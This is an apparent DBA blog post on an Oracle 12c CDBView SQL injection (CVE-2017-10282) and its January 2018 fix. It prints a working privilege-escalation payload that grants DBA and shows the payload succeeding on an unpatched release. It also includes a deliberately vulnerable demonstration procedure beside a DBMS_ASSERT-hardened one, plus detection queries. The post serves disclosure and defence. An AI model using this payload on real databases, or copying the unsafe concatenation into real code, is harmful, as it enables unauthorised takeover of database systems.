SQL Injection on 12c CDBView package finally fixed on 180116


Since the last quarter of 2016, a very easy-to-exploit SQL injection has been public: with the combination CREATE SESSION + EXECUTE_CATALOG_ROLE, a user could escalate their privileges to DBA. The first time I read about this flaw was on Mahmoud Hatem's blog.

This SQL injection affects 12.1.0.2 and 12.2.0.1 when the user holds these privileges in CDB$ROOT, or in a non-CDB database.

After investigating all the code changes performed by the 180116 CPU on BPs, PSUs, RUs and RURs (see the linked post for the full list of changes), I noticed that Oracle added a subfunction called isLegalOwnerViewName to CDBView. It does something similar to DBMS_ASSERT: the owner and view names are validated before they are used in the dynamic SQL.

Checking the list of all CVEs corrected by these updates, we can infer that this bug is CVE-2017-10282, an identifier that was only created on 21 June 2017, months after the technique became public.
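The following is an added illustration, not CDBView's source (which is not reproduced on this page) and not Oracle's isLegalOwnerViewName: a definer's-rights procedure that builds CREATE OR REPLACE VIEW by string concatenation, which is the pattern the payload below relies on, next to the same procedure guarded with DBMS_ASSERT. The procedure and parameter names (demo_view_maker_unsafe, demo_view_maker_safe, p_new_view, p_old_view) and the view name DEMO_V are assumptions; the payload is built in the same style as the one used against CDBView.

```sql
-- Added example, not from the original post or from Oracle's code.
-- Run only in a throwaway database: querying the view created by the
-- unsafe call grants DBA to C##DBARJ, exactly like the CDBView payload.

-- 1. Vulnerable pattern: caller-controlled strings spliced straight into DDL.
--    The double quotes are meant to "protect" the identifiers, but a quote
--    inside the argument closes them early.
CREATE OR REPLACE PROCEDURE demo_view_maker_unsafe (
    p_new_view IN VARCHAR2,
    p_old_view IN VARCHAR2)
AUTHID DEFINER            -- runs with the owner's (SYS-like) privileges
IS
    l_ddl VARCHAR2(32767);
BEGIN
    l_ddl := 'CREATE OR REPLACE VIEW "' || p_new_view ||
             '" AS SELECT * FROM "' || p_old_view || '"';
    EXECUTE IMMEDIATE l_ddl;
END;
/

-- 2. Hardened pattern: every identifier goes through DBMS_ASSERT first.
--    SIMPLE_SQL_NAME accepts only a plain or properly double-quoted identifier
--    and raises ORA-44003 (invalid SQL name) for anything else: embedded
--    quotes, spaces, parentheses, comment markers.
--    SQL_OBJECT_NAME additionally requires the object to exist (ORA-44002).
CREATE OR REPLACE PROCEDURE demo_view_maker_safe (
    p_new_view IN VARCHAR2,
    p_old_view IN VARCHAR2)
AUTHID DEFINER
IS
    l_new VARCHAR2(130);
    l_old VARCHAR2(130);
BEGIN
    -- ENQUOTE_NAME wraps an unquoted name in double quotes (upper-casing it,
    -- as Oracle would) and leaves an already quoted name alone.
    l_new := DBMS_ASSERT.ENQUOTE_NAME(DBMS_ASSERT.SIMPLE_SQL_NAME(p_new_view));
    l_old := DBMS_ASSERT.SQL_OBJECT_NAME(p_old_view);
    EXECUTE IMMEDIATE 'CREATE OR REPLACE VIEW ' || l_new ||
                      ' AS SELECT * FROM ' || l_old;
END;
/

-- 3. Payload in the style of the post: close the quoted identifier, start a
--    WITH FUNCTION subquery (allowed by the /*+WITH_PLSQL*/ hint), swallow the
--    text the procedure puts between its two arguments in a /* ... */ comment,
--    and comment out the trailing quote with --.
DECLARE
    l_new VARCHAR2(4000) :=
        'DEMO_V" AS SELECT /*+WITH_PLSQL*/ x FROM (WITH FUNCTION f RETURN VARCHAR2 IS '
     || 'PRAGMA AUTONOMOUS_TRANSACTION; BEGIN /* ';
    l_old VARCHAR2(4000) :=
        ' */ EXECUTE IMMEDIATE ''grant dba to c##dbarj''; RETURN ''1''; END; '
     || 'SELECT f AS x FROM dual)-- ';
BEGIN
    -- Unsafe: succeeds, and the resulting DDL is
    --   CREATE OR REPLACE VIEW "DEMO_V" AS SELECT /*+WITH_PLSQL*/ x FROM (WITH FUNCTION f ...
    --   ... BEGIN /* " AS SELECT * FROM " */ EXECUTE IMMEDIATE 'grant dba to c##dbarj'; ...
    -- A later  SELECT /*+WITH_PLSQL*/ * FROM demo_v  runs f as the view owner.
    demo_view_maker_unsafe(l_new, l_old);

    -- Safe: the same call never reaches EXECUTE IMMEDIATE.
    BEGIN
        demo_view_maker_safe(l_new, l_old);
    EXCEPTION
        WHEN OTHERS THEN
            -- expected: ORA-44003: invalid SQL name
            DBMS_OUTPUT.PUT_LINE('rejected: ' || SQLERRM);
    END;
END;
/
```

The important design point is where the check sits: validating the identifiers before concatenation is what makes the whole family of payloads fail, whereas trying to blacklist characters in the finished statement would not. It is also why the fixed CDBView fails at an earlier line (39) than the vulnerable one (56) in the sessions below: the name check runs before any DDL is assembled.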

Let's apply the injection on 12.2.0.1 with the 171017 RU and then with the 180116 RU, and compare the results. CDBView runs as SYS and concatenates its arguments into a CREATE OR REPLACE VIEW statement. The payload closes the double-quoted view name early and appends its own SELECT, a WITH FUNCTION declared inside a subquery (permitted by the /*+WITH_PLSQL*/ hint); the /* at the end of the second argument and the */ at the start of the last one turn whatever CDBView inserts in between into a comment, and the trailing -- discards the rest of the statement. The function carries PRAGMA AUTONOMOUS_TRANSACTION so it may run DDL when invoked from a query, and because the view is created by SYS, the function executes with SYS privileges when any user selects from the view:

On 12.2.0.1 with RU 171017 applied:

WARNING: in this example the view ALL_CUBES will be replaced.

[oracle@localhost ~]$ opatch lspatches
26710464;Database Release Update : 12.2.0.1.171017 (26710464)

OPatch succeeded.
[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:10:29 2018

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> create user c##dbarj identified by oracle;

User created.

SQL> grant create session to c##dbarj;

Grant succeeded.

SQL> grant execute_catalog_role to c##dbarj;

Grant succeeded.

SQL> conn c##dbarj/oracle
Connected.
SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL> -- DON'T RUN IN PRODUCTION --
SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;

*
ERROR at line 1:
ORA-00905: missing keyword
ORA-06512: at "SYS.CDBVIEW", line 56
ORA-06512: at line 1


SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

X
--------------------------------------------------------------------------------
1

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
DBA
EXECUTE_CATALOG_ROLE

SQL>

The SQL injection worked. Note that the ORA-00905 does not mean the call failed safely: the error is raised at line 56 of CDBView, by a statement that runs after the injected CREATE OR REPLACE VIEW, so the view had already been replaced. That is why ALL_CUBES now returns the function's output and why c##dbarj holds DBA after a single SELECT.

And now on 12.2.0.1 with RU 180116 applied:

[oracle@localhost ~]$ opatch lspatches
27105253;Database Release Update : 12.2.0.1.180116 (27105253)

OPatch succeeded.
[oracle@localhost ~]$ sqlplus / as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Jan 26 09:20:46 2018

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL> create user c##dbarj identified by oracle;

User created.

SQL> grant create session to c##dbarj;

Grant succeeded.

SQL> grant execute_catalog_role to c##dbarj;

Grant succeeded.

SQL> conn c##dbarj/oracle
Connected.
SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL> exec sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- ');
BEGIN sys.CDBView.create_cdbview(true,'ALL_CUBES" as select /*+WITH_PLSQL*/ x from (WITH FUNCTION f RETURN varchar2 IS PRAGMA AUTONOMOUS_TRANSACTION;BEGIN /* ','old_view' ,' */ execute immediate ''grant dba to c##dbarj''; RETURN ''1'';END; SELECT f as x FROM dual)-- '); END;

*
ERROR at line 1:
ORA-00942: table or view does not exist
ORA-06512: at "SYS.CDBVIEW", line 39
ORA-06512: at line 1


SQL> select /*+WITH_PLSQL*/ * from ALL_CUBES;

no rows selected

SQL> select granted_role from user_role_privs;

GRANTED_ROLE
--------------------------------------------------------------------------------
EXECUTE_CATALOG_ROLE

SQL>

The SQL injection no longer works: the call now fails with ORA-00942 at line 39 of CDBView, before any view is created, ALL_CUBES keeps its original definition and the role list is unchanged.

This is yet another reason to always stay on the latest SPU/PSU/BP/RU/RUR, whichever security patch model you follow. Keep in mind that this particular fix lives in a PL/SQL package body, so it only takes effect once datapatch has applied the SQL part of the patch to the database, not merely once opatch has patched the binaries.
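As an added example (not part of the original post), these are the checks I would run as SYSDBA in CDB$ROOT, or in a non-CDB, to confirm the patch level inside the database, to see who holds the preconditions, and to look for a view that has already been replaced by a payload like the one above. The patch IDs are the two shown in the opatch output in this post; everything else uses standard 12c dictionary views.

```sql
-- Added example, not from the original post. Run as SYSDBA in CDB$ROOT.

-- 1. What did datapatch actually load into this database? opatch lspatches only
--    reports the binary level; the CDBView fix is SQL/PLSQL applied by datapatch.
SELECT patch_id, version, action, status, action_time, description
FROM   dba_registry_sqlpatch
WHERE  patch_id IN (26710464, 27105253)      -- 171017 RU and 180116 RU from the post
ORDER  BY action_time;

-- 2. Who could have used the injection? Every grantee of EXECUTE_CATALOG_ROLE
--    in the root (common or local) met the preconditions on an unpatched 12.1/12.2.
SELECT grantee, admin_option, common
FROM   dba_role_privs
WHERE  granted_role = 'EXECUTE_CATALOG_ROLE'
ORDER  BY grantee;

-- 3. Has a SYS-owned view been replaced by a definition that smuggles in PL/SQL?
--    dba_views.text is a LONG and cannot be searched with LIKE; the 12c text_vc
--    column holds the first 4000 characters, which is plenty for this payload.
--    No shipped 12.2 dictionary view should declare a WITH FUNCTION or carry
--    PRAGMA AUTONOMOUS_TRANSACTION in its text.
SELECT owner, view_name, text_vc
FROM   dba_views
WHERE  owner = 'SYS'
AND   (   UPPER(text_vc) LIKE '%WITH%FUNCTION%'
       OR UPPER(text_vc) LIKE '%AUTONOMOUS_TRANSACTION%'
       OR UPPER(text_vc) LIKE '%WITH_PLSQL%');

-- 4. The payoff of the payload is a role grant: list everyone who ended up with
--    DBA and compare against what is expected for this database.
SELECT grantee, admin_option, common
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;
```

If query 3 returns a hit, the view has to be recreated from its catalog script and the grants found by query 4 revoked; patching afterwards closes the hole but does not undo a grant that has already been made.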

